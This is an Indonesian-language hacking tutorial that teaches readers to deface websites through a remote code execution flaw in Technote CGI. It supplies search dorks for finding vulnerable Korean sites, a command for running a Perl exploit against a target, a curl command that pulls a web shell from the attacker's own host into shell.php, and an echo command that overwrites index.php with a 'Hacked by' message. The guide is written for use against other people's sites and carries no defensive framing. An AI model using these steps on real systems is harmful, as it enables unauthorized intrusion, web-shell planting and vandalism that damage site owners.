Bismillahirahmanirahim, Hallo sobat IT kali ini saya akan share exploit Deface RCE (Remote Code Execution) Technote CGI Exploit 0.4 , sebelumnya thanks dulu buat tatsumi crew yang udah ngasih tutorial.
Langsung aja skuy lur..
++++++++++++++++++++++++++++++++++++++++++++++++++++
Dork : inurl:/technote/main.cgi
inurl:/iboard.cgi site:kr (kembangin lagi )
Exploit : site.kr/[path]/main.cgi?board=FREE_BOARD
Tool : disini (perl file)
++++++++++++++++++++++++++++++++++++++++++++++++++++
Silahkan temen - temen cari targetnya dulu dah pake dork yang udah saya kasih ..
Jangan lupa save sourc tool yang udah saya share dengan extensi *pl , jika kalian pake linux pastikan terinstall dulu services perlnya, kalo yang pake windows bisa install Xampp kemudian simpan file di folder
/xampp/perl/bin/ <<
kebetulan saya menggunakkan windows jadi saya pun memakai perl yang ada di xampp, selanjutnya buka CMD windows kalian , pastikan kalian berada dalam direktori /xampp/perl/bin , kalo dilinux kalian bisa langsung menjalankan. kemudian bisa langsung kalian jalankan exploitnya dengan memasukkan perintah:
cmd>perl exploit.pl http://target.kr/[path]/main.cgi?board=FREE_BOARD
kemudian kalian bisa test perintah perintah linux dulu untuk memastikan sudah terhubung dengan situs. seperti ls , uname -a , dsb.
Kemudian kalian coba cari cari dir yang bisa diupload file shell , untuk mengupload shell kalian . kalian paste dulu shell kalian di pastebin atau dimana saya yang penting shell kalian nantinya berbentuk text dulu terus kalian bisa gunakkan perintah:
curl http://situskalian.com/tes.txt --output shell.phpatau kalian bisa gunakan perintah yang kalian tahu silahkan, saya biasa menggunakan perintah ini.
Jika tidak bisa upload file kalian bisa creat file saja dengan perintah
echo "Hacked by Peluru Kertas - Dx_Cyber">index.phpSilahkan kalian variasikan lagi karena tutorial dari saya terbatas.
Sekian tutorial yang bisa saya berikan mohon maaf bila ada kesalahan, semoga bermanfaat ilmunya
Wasallamualaikum
